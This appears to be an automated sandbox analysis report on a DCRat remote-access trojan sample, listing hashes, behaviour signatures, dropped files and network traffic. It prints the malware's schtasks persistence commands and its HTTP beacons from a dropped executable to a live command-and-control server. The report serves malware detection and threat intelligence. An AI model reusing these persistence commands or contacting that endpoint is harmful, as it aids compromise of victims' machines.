dcrat | 8b72c7dce8c76cc75eb19390ca84dc43a2c8e47eb627b9894e534be9328e9ecc | Triage

Analysis

max time kernel
139s
max time network
133s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
29/10/2024, 01:26 UTC

Sharing

Report Analysis Logs

General

Target

7a1a3397249836cac73c5f104211fb6cbb2317c830c148a65acb709210aadd2e.exe
Size

827KB
MD5

759b333fd8d1eedb5666fdea1da25b25
SHA1

b66fc861196561f793062622b88cdb1065e35459
SHA256

7a1a3397249836cac73c5f104211fb6cbb2317c830c148a65acb709210aadd2e
SHA512

831006157773f5a30dbf07dcbfd484f49a978c077f8e132d33c8e044f8141462bb890c344724b23c3144488c1c406d576b7009c1205772a503ce6cc92692aec3
SSDEEP

12288:M+B2ad7F/Jf2xm1/nNfkOV+0Z3+5DlpAXdet4y5+q:gad7PuxmRn60Zu7xtZp

Score

10^/10

dcrat infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Process spawned unexpected child process 9 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	208	788	schtasks.exe	84
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	644	788	schtasks.exe	84
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1040	788	schtasks.exe	84
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2676	788	schtasks.exe	84
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4736	788	schtasks.exe	84
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2180	788	schtasks.exe	84
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3808	788	schtasks.exe	84
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1652	788	schtasks.exe	84
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1484	788	schtasks.exe	84

DCRat payload 2 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

resource	yara_rule
behavioral2/memory/1468-1-0x0000000000810000-0x00000000008E6000-memory.dmp	dcrat
behavioral2/files/0x000a000000023b7d-18.dat	dcrat

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	7a1a3397249836cac73c5f104211fb6cbb2317c830c148a65acb709210aadd2e.exe

Executes dropped EXE 1 IoCs

pid	Process
1644	fontdrvhost.exe

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_2019.19071.19011.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\csrss.exe	7a1a3397249836cac73c5f104211fb6cbb2317c830c148a65acb709210aadd2e.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\addins\6cb0b6c459d5d3	7a1a3397249836cac73c5f104211fb6cbb2317c830c148a65acb709210aadd2e.exe
File created	C:\Windows\addins\dwm.exe	7a1a3397249836cac73c5f104211fb6cbb2317c830c148a65acb709210aadd2e.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	7a1a3397249836cac73c5f104211fb6cbb2317c830c148a65acb709210aadd2e.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
1484	schtasks.exe
1040	schtasks.exe
2676	schtasks.exe
1652	schtasks.exe
2180	schtasks.exe
3808	schtasks.exe
208	schtasks.exe
644	schtasks.exe
4736	schtasks.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1468	7a1a3397249836cac73c5f104211fb6cbb2317c830c148a65acb709210aadd2e.exe
1644	fontdrvhost.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1468	7a1a3397249836cac73c5f104211fb6cbb2317c830c148a65acb709210aadd2e.exe
Token: SeDebugPrivilege	1644	fontdrvhost.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1468 wrote to memory of 2432	1468	7a1a3397249836cac73c5f104211fb6cbb2317c830c148a65acb709210aadd2e.exe	94
PID 1468 wrote to memory of 2432	1468	7a1a3397249836cac73c5f104211fb6cbb2317c830c148a65acb709210aadd2e.exe	94
PID 2432 wrote to memory of 1064	2432	cmd.exe	96
PID 2432 wrote to memory of 1064	2432	cmd.exe	96
PID 2432 wrote to memory of 1644	2432	cmd.exe	103
PID 2432 wrote to memory of 1644	2432	cmd.exe	103

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\7a1a3397249836cac73c5f104211fb6cbb2317c830c148a65acb709210aadd2e.exe
"C:\Users\Admin\AppData\Local\Temp\7a1a3397249836cac73c5f104211fb6cbb2317c830c148a65acb709210aadd2e.exe"
1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1468
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\PN219sj1of.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2432
- - C:\Windows\system32\w32tm.exe
    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
    3⤵
    PID:1064
- - C:\Recovery\WindowsRE\fontdrvhost.exe
    "C:\Recovery\WindowsRE\fontdrvhost.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1644

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Users\Default\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:208

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Default\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:644

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Users\Default\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1040

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 11 /tr "'C:\Windows\addins\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2676

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\addins\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4736

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\Windows\addins\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2180

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1652

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1484

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

217.106.137.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

217.106.137.52.in-addr.arpa

IN PTR

Response
DNS

172.214.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.214.232.199.in-addr.arpa

IN PTR

Response
DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.ax-0001.ax-msedge.net

g-bing-com.ax-0001.ax-msedge.net

IN CNAME

ax-0001.ax-msedge.net

ax-0001.ax-msedge.net

IN A

150.171.27.10

ax-0001.ax-msedge.net

IN A

150.171.28.10
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=e1c641a1a5344ed79557b2ec2255151a&localId=w:2D3093FA-6F32-4948-30D6-822D6819A5AC&deviceId=6755476188894822&anid=

Remote address:

150.171.27.10:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=e1c641a1a5344ed79557b2ec2255151a&localId=w:2D3093FA-6F32-4948-30D6-822D6819A5AC&deviceId=6755476188894822&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=08E12506B89868D401BB3021B9A969A6; domain=.bing.com; expires=Sun, 23-Nov-2025 01:26:18 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: E0170643A420492080BB36C49B54A581 Ref B: LON601060102042 Ref C: 2024-10-29T01:26:18Z
date: Tue, 29 Oct 2024 01:26:18 GMT
GET

https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=e1c641a1a5344ed79557b2ec2255151a&localId=w:2D3093FA-6F32-4948-30D6-822D6819A5AC&deviceId=6755476188894822&anid=

Remote address:

150.171.27.10:443

Request

GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=e1c641a1a5344ed79557b2ec2255151a&localId=w:2D3093FA-6F32-4948-30D6-822D6819A5AC&deviceId=6755476188894822&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=08E12506B89868D401BB3021B9A969A6

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=0U7vf1e18ROegz8lUdYOijSTD7raVisg9F9WiF3PhTk; domain=.bing.com; expires=Sun, 23-Nov-2025 01:26:18 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: B5AD91E89F2149A8B9085C218F3B6007 Ref B: LON601060102042 Ref C: 2024-10-29T01:26:18Z
date: Tue, 29 Oct 2024 01:26:18 GMT
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=e1c641a1a5344ed79557b2ec2255151a&localId=w:2D3093FA-6F32-4948-30D6-822D6819A5AC&deviceId=6755476188894822&anid=

Remote address:

150.171.27.10:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=e1c641a1a5344ed79557b2ec2255151a&localId=w:2D3093FA-6F32-4948-30D6-822D6819A5AC&deviceId=6755476188894822&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=08E12506B89868D401BB3021B9A969A6; MSPTC=0U7vf1e18ROegz8lUdYOijSTD7raVisg9F9WiF3PhTk

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 2750383DE1A042D4AF2DD57E888447DF Ref B: LON601060102042 Ref C: 2024-10-29T01:26:19Z
date: Tue, 29 Oct 2024 01:26:18 GMT
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

76.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

76.32.126.40.in-addr.arpa

IN PTR

Response
DNS

26.35.223.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

26.35.223.20.in-addr.arpa

IN PTR

Response
DNS

133.211.185.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.211.185.52.in-addr.arpa

IN PTR

Response
DNS

artema1m.beget.tech

fontdrvhost.exe

Remote address:

8.8.8.8:53

Request

artema1m.beget.tech

IN A

Response

artema1m.beget.tech

IN A

5.101.153.48
GET

http://artema1m.beget.tech/L1nc0In.php?jEvvfXkSOBUzInLimsu=5KktR3bHaR20Lv5&2eb64d735c3ceb3cf44155d276f7f3b6=c881cd7e5eb0b68e0a305909638f2735&c145db2fdebeb12e252b4934f8f5f296=QY2kzN1kDOiBTN5QjNwQzM3EmYmFTMyMTY5ETZmZjNwIzMkVDM2EzN&jEvvfXkSOBUzInLimsu=5KktR3bHaR20Lv5

fontdrvhost.exe

Remote address:

5.101.153.48:80

Request

GET /L1nc0In.php?jEvvfXkSOBUzInLimsu=5KktR3bHaR20Lv5&2eb64d735c3ceb3cf44155d276f7f3b6=c881cd7e5eb0b68e0a305909638f2735&c145db2fdebeb12e252b4934f8f5f296=QY2kzN1kDOiBTN5QjNwQzM3EmYmFTMyMTY5ETZmZjNwIzMkVDM2EzN&jEvvfXkSOBUzInLimsu=5KktR3bHaR20Lv5 HTTP/1.1
Accept: */*
Content-Type: text/css
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: artema1m.beget.tech
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx-reuseport/1.21.1
Date: Tue, 29 Oct 2024 01:26:26 GMT
Content-Type: text/html
Content-Length: 274
Last-Modified: Thu, 29 Aug 2024 10:44:19 GMT
Connection: keep-alive
Keep-Alive: timeout=30
ETag: "66d05103-112"
Accept-Ranges: bytes
GET

http://artema1m.beget.tech/L1nc0In.php?jEvvfXkSOBUzInLimsu=5KktR3bHaR20Lv5&2eb64d735c3ceb3cf44155d276f7f3b6=c881cd7e5eb0b68e0a305909638f2735&c145db2fdebeb12e252b4934f8f5f296=QY2kzN1kDOiBTN5QjNwQzM3EmYmFTMyMTY5ETZmZjNwIzMkVDM2EzN&jEvvfXkSOBUzInLimsu=5KktR3bHaR20Lv5

fontdrvhost.exe

Remote address:

5.101.153.48:80

Request

GET /L1nc0In.php?jEvvfXkSOBUzInLimsu=5KktR3bHaR20Lv5&2eb64d735c3ceb3cf44155d276f7f3b6=c881cd7e5eb0b68e0a305909638f2735&c145db2fdebeb12e252b4934f8f5f296=QY2kzN1kDOiBTN5QjNwQzM3EmYmFTMyMTY5ETZmZjNwIzMkVDM2EzN&jEvvfXkSOBUzInLimsu=5KktR3bHaR20Lv5 HTTP/1.1
Accept: */*
Content-Type: text/css
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: artema1m.beget.tech

Response

HTTP/1.1 200 OK

Server: nginx-reuseport/1.21.1
Date: Tue, 29 Oct 2024 01:26:26 GMT
Content-Type: text/html
Content-Length: 274
Last-Modified: Thu, 29 Aug 2024 10:44:19 GMT
Connection: keep-alive
Keep-Alive: timeout=30
ETag: "66d05103-112"
Accept-Ranges: bytes
DNS

48.153.101.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

48.153.101.5.in-addr.arpa

IN PTR

Response

48.153.101.5.in-addr.arpa

IN PTR

m2keplerbegetcom
DNS

50.23.12.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

50.23.12.20.in-addr.arpa

IN PTR

Response
DNS

206.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.23.85.13.in-addr.arpa

IN PTR

Response
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

100.209.201.84.in-addr.arpa

Remote address:

8.8.8.8:53

Request

100.209.201.84.in-addr.arpa

IN PTR

Response
DNS

22.236.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

22.236.111.52.in-addr.arpa

IN PTR

Response
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

ax-0001.ax-msedge.net

ax-0001.ax-msedge.net

IN A

150.171.28.10

ax-0001.ax-msedge.net

IN A

150.171.27.10
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340418561_1E2KGQS8IVJEZ1891&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239340418561_1E2KGQS8IVJEZ1891&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 1310684
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 12FDBF152DAC4B1DBC6D707B173AC1FA Ref B: LON601060103031 Ref C: 2024-10-29T01:27:58Z
date: Tue, 29 Oct 2024 01:27:58 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360284735_1J9G8ZRD0Q7KNETKQ&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239360284735_1J9G8ZRD0Q7KNETKQ&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 666327
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 780F4FA5AECA46F7A8378AC3784D195D Ref B: LON601060103031 Ref C: 2024-10-29T01:27:58Z
date: Tue, 29 Oct 2024 01:27:58 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340418562_1168Q5I7J0C0R4GX2&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239340418562_1168Q5I7J0C0R4GX2&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 1374508
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 7310DF34351B48C78D54211295CA42CD Ref B: LON601060103031 Ref C: 2024-10-29T01:27:58Z
date: Tue, 29 Oct 2024 01:27:58 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360284736_11427X8L96F0YA4AW&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239360284736_11427X8L96F0YA4AW&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 679182
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 4E3C55E4705144F8B31F5528F3B744E8 Ref B: LON601060103031 Ref C: 2024-10-29T01:27:58Z
date: Tue, 29 Oct 2024 01:27:58 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239339388117_1JB6V9WCFP6PY54M9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239339388117_1JB6V9WCFP6PY54M9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 820704
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 8CA8701940894D08907C13DD88A13AD9 Ref B: LON601060103031 Ref C: 2024-10-29T01:27:58Z
date: Tue, 29 Oct 2024 01:27:58 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239339388118_1MQFN52AS0USJY79P&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239339388118_1MQFN52AS0USJY79P&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 522433
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 6A1B75127736472BA37A7870AA87D745 Ref B: LON601060103031 Ref C: 2024-10-29T01:27:58Z
date: Tue, 29 Oct 2024 01:27:58 GMT
DNS

205.47.74.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

205.47.74.20.in-addr.arpa

IN PTR

Response
DNS

10.28.171.150.in-addr.arpa

Remote address:

8.8.8.8:53

Request

10.28.171.150.in-addr.arpa

IN PTR

Response

150.171.27.10:443

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=e1c641a1a5344ed79557b2ec2255151a&localId=w:2D3093FA-6F32-4948-30D6-822D6819A5AC&deviceId=6755476188894822&anid=

tls, http2

2.0kB
9.4kB
22
19

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=e1c641a1a5344ed79557b2ec2255151a&localId=w:2D3093FA-6F32-4948-30D6-822D6819A5AC&deviceId=6755476188894822&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=e1c641a1a5344ed79557b2ec2255151a&localId=w:2D3093FA-6F32-4948-30D6-822D6819A5AC&deviceId=6755476188894822&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=e1c641a1a5344ed79557b2ec2255151a&localId=w:2D3093FA-6F32-4948-30D6-822D6819A5AC&deviceId=6755476188894822&anid=

HTTP Response

204
5.101.153.48:80

